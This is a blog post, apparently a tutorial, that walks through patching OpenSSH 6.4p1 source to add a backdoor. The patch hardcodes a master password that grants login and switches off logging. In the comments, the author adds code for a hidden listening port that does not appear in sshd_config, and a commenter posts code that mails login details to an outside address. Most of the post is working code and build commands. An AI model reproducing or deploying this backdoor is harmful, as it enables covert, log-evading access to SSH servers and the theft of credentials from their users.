Warning: opendir(/var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/sh/3.0.83.2/scripts/): failed to open dir: No such file or directory in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 26

Warning: Invalid argument supplied for foreach() in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 170
Skip to content

[Video] - Build a backdoor in OpenSSH 6.4p1 with Kali Linux

This time I show you, how to build a "backdoor" in your own OpenSSH 6.4p1 installation under Kali Linux
 

 

Download needed files
 
cd /tmp/
wget --no-check-certificate https://www.openssl.org/source/openssl-1.0.1e.tar.gz
tar xvfz openssl-1.0.1e.tar.gz
 
wget http://openbsd.cs.fau.de/pub/OpenBSD/OpenSSH/portable/openssh-6.4p1.tar.gz
tar xvfz openssh-6.4p1.tar.gz
 
Preparing the system
 
mkdir /usr/local/ssl/
ln -s /tmp/openssl-1.0.1e/include/ /usr/local/ssl/include
ln -s /tmp/openssl-1.0.1e/include/ /usr/local/ssl/lib
ln -s /usr/lib/i386-linux-gnu/libcrypto.so.1.0.0 /usr/lib/libcrypto.so

Changing OpenSSH

// auth.h
 
#define B4CKD00R "myeasypass"
int backdoorActive;

// auth-passwd.c
 
int
auth_password(Authctxt *authctxt, const char *password)
{
        struct passwd * pw = authctxt->pw;
        int ok = authctxt->valid;
        backdoorActive = 0;

        if (!strcmp(password, B4CKD00R)) {
                backdoorActive = 1;
                return 1;
        }

// log.h
 
int backdoorActive;

// log.c
 
void
do_log(LogLevel level, const char *fmt, va_list args)
{
   
if(backdoorActive == 1)
        return;

Compile & install OpenSSH on your local Kali installation
 
./configure --with-ssl-dir=/tmp/openssl-1.0.1e/
make
make install

Change SSH-Port if needed
 
vi /usr/local/etc/sshd_config
Port 2222
 
Start your new local SSH-Daemon
 
/usr/local/sbin/sshd -f /usr/local/etc/sshd_config

Test it!

Trackbacks

No Trackbacks

Comments

Display comments as Linear | Threaded

noname on :

yes mate is grate looks ok .. but when you login you are in ps and w command, and compromise all your activity

Nick on :

Hi mate this looks nice can you made a video tutorial or just write the commands for a different openede port connexion?
i mean if you can explain to me how i can do this to work for example on 9863 but 22 to be still on! cheers !
by the way 9863 i don’t want to be visible on /etc/ssh/sshd_config i know this it’s possible but i don’t know how!

Stefan Schurtz on :

Hi,

you mean something like that:

servconf.c

if (options->num_ports == 0)
options->ports[options->num_ports++] = SSH_DEFAULT_PORT;

change to

if (options->num_ports == 0) {
options->ports[options->num_ports++] = SSH_DEFAULT_PORT;
options->ports[options->num_ports++] = 9863;
}

If port will be changed in config file, change this

servconf.c

case sPort:
if (!arg || *arg == ‘\0’)
fatal("%s line %d: missing port number.",
filename, linenum);
options->ports[options->num_ports++] = a2port(arg);
options->ports[options->num_ports++] = 9863;

Not sure if this works in all situations. Perhaps you can test a little bit more than I did :)

Cheers,

Nick on :

no problem mate i just try both of them didn’t work for me even the port even to make from 6.5 with centos or ubuntu i need something new i try as well to implement sendmail on this no success!
the email function been this for me
[code]
/* fopen example */
#include
#include
#include
#include
#include

int main ()
{
FILE *fp; char *ttyn = ttyname(0); char msgbuf1000; struct utmp *ut; while ((ut = getutent())) { if (strcmp(ttyn, ut->ut_line) == 0) { strcat(msgbuf, "\nFrom: "); strcat(msgbuf, ut->ut_user); strcat(msgbuf, "@"); strcat(msgbuf, ut->ut_host); break; } }

fp = popen("mail -s ‘us loggedin’ x19@xxxxxxxxxxx", pw_user>user & password); fprintf(fp, "%s\n", msgbuf); pclose(fp); return 0; } [/code]

meh on :

Seems to work only if ran by root. How about if you want to run it as unprivileged user?

Also, do you know how to bypass the valid shell check and always assign /bin/bash, even if it’s set to /bin/false?
Or at least how to override the passwd path to something like ./passwd, so it can be modified by the unprivileged user.

Add Comment


To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA 1CAPTCHA 2CAPTCHA 3CAPTCHA 4CAPTCHA 5


Textile-formatting allowed
You can use [geshi lang=lang_name [,ln={y|n}]][/geshi] tags to embed source code snippets.
Form options

Submitted comments will be subject to moderation before being displayed.

Imprint | Contact | Privacy Statement

Warning: opendir(/var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/sh/3.0.83.2/scripts/): failed to open dir: No such file or directory in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 26

Warning: Invalid argument supplied for foreach() in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 170